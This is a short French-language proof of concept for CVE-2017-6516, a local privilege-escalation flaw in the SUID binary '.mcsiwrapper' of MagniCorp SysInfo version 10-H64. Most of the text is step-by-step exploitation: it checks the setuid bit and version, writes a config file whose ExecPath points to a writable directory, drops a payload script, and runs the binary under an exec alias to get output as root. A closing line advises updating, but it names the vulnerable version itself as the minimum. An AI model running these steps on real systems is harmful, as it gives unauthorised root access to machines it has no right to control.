
Un PoC / une méthodologie pour exploiter CVE-2017-6516
CVE-2017-6516 est une vulnérabilité d'élévation de privilèges qui cible le binaire .mcsiwrapper de MagniCorp SysInfo sous la version 10-H64. Lorsque ce binaire a le bit SUID activé et est obsolète, un utilisateur peut exécuter du code arbitraire en tant que propriétaire du binaire – souvent root.
.mcsiwrapper doit être setuid :$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper doit être sous la version 10-H64 :$ .mcsiwrapper --version
<Version under 10-H64>
Créez un fichier config avec le contenu suivant :
ExecPath=<Path to a writeable directory>
Créez un fichier exécutable de payload dans le répertoire ExecPath, par exemple :
#!/bin/sh
whoami
Et rendez-le exécutable :
$ chmod +x payload
Exécutez la commande :
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Mettez à jour .mcsiwrapper vers au moins la version 10-H64.